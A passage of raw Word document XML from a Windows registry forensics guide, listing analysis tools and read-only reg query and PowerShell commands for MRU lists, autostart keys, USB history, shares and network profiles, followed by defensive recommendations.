          <w:bCs/>
        </w:rPr>
        <w:t>Reg.exe / PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> – Native tools to query registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6A27B0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>USBDeviceForensics</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WoanWare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> – Automates USB device history extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79818D29" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TZWorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> lp.exe &amp; jmp.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> – Utilities for LNK and Jump List file analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A115268" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> – Detects persistence locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05934B02" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Registry Explorer</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> – For detailed forensic registry analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB13C80" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Event Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> – To complement registry findings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706B0437" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="043B7884">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="548DACC9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step-by-Step Commands &amp; Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2A9022" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Enumerate MRU (Most Recently Used) Lists and User Activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE83E85" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"># List </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>LastVisitedPidlMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> keys (Explorer recent locations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B349CF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16236DB5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="6834749F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># List recently opened documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6AD69F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B869F5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="3DC58776" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># View typed paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEAA131" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36CC9D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="0A546786" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>UserAssist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> keys (encoded ROT13, requires decoding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631433E7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191815EA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="788B173F">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0D6230" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Enumerate Persistence Entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C9D69" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Current user Run keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF940C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCF4E1A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F408B3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="20FE78EC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Local machine Run keys (system-wide)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D71AA8F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA90BF5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CB84E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="0B07CE0A">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30775D61" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. USB Device Enumeration and History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E46324B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Enumerate USB devices and serial numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16046235" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Enum\USBSTOR"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41384194" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="263898B1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Check mounted devices and associated volume GUIDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6446948B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:lastRenderedPageBreak/>
        <w:t>reg query "HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>MountedDevices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD74F6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="393CBA63" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Identify users who mounted devices (NTUSER.DAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C74A92" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKU\&lt;SID&gt;\Software\Microsoft\Windows\CurrentVersion\Explorer\Mountpoints2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D84B562" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="072F2B20" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"># Check USB connection logs in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>setupapi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> logs (Windows 7/8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379618C8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>Get-Content C:\Windows\inf\setupapi.dev.log | Select-String "&lt;USB Serial#&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441864D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="45781CBD">
          <v:rect id="_x0000_i1070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CA030D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Network and Shares Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E3E3B6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># List open shares on system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A39CBA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Services\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>LanmanServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Shares"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC05CB9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="4AB1CDD1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># List network interfaces and IP config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231B600" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681FE721" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="2AF2C19E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Network Location Awareness profiles (Vista+)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFAA211" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>NetworkList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Profiles"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53282D95" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="47698AF0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t># Firewall profile info related to network location awareness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370402EA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>NetworkList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>\Signatures"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF089CD" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="2BF366F6">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E33931" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Prefetch &amp; Jump Lists (Program Execution History)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D15DDB9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"># View </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>prefetch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> files in directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7E2A4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t>Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>ChildItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> C:\Windows\Prefetch\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE7EA7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="047D94AE" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"># Analyze jump lists using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>TZWorks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> utilities (lp.exe and jmp.exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BD79AD" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"># (Run lp.exe or jmp.exe pointing to Recent or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t>AutomaticDestinations</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> folder)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF1D0F7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="33C1BF37">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEA7BE1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F5302" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Regularly monitor and audit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> to detect unauthorized persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B405FA0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disable or monitor USB device usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> on sensitive systems to prevent data leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA1462E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Leverage USB device forensic analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> to track potential data exfiltration and attacker footprint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490E305F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Limit and monitor open shares</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> to reduce lateral movement risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062884D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Review network profiles and firewall rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC297B">
        <w:t xml:space="preserve"> to detect anomalous connections or unauthorized network access.</w:t>
      </w:r>
    </w:p>
